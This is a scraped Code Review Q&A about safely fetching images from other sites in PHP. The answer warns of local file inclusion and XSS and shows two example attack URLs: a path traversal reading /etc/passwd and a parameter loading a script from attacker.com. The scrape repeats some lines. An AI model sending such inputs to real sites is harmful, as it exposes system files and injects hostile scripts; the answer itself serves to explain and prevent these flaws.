patternphpModerate
Get image from other site in PHP
Viewed 0 times
imagephpothergetsitefrom
Problem
I would like to get images from other websites.
This is my current method but I'm not sure if it is alright.
If not, how should I do it?
This is my current method but I'm not sure if it is alright.
If not, how should I do it?
Solution
Your code is vulnerable to LFI and XSS.
This would load the local file /etc/passwd and display it.
This would load and display the remote file xss.php, which would lead to XSS.
For better solutions, see eg here. When outputting images, you should use the image output functions such as
http://localhost/yourscript.php?url=../../../../../../etc/passwdThis would load the local file /etc/passwd and display it.
http://localhost/yourscript.php?url=http://attacker.com/xss.phpThis would load and display the remote file xss.php, which would lead to XSS.
For better solutions, see eg here. When outputting images, you should use the image output functions such as
imagejpeg, not generic file loading functions.Code Snippets
http://localhost/yourscript.php?url=../../../../../../etc/passwdhttp://localhost/yourscript.php?url=http://attacker.com/xss.phpContext
StackExchange Code Review Q#125030, answer score: 14
Revisions (0)
No revisions yet.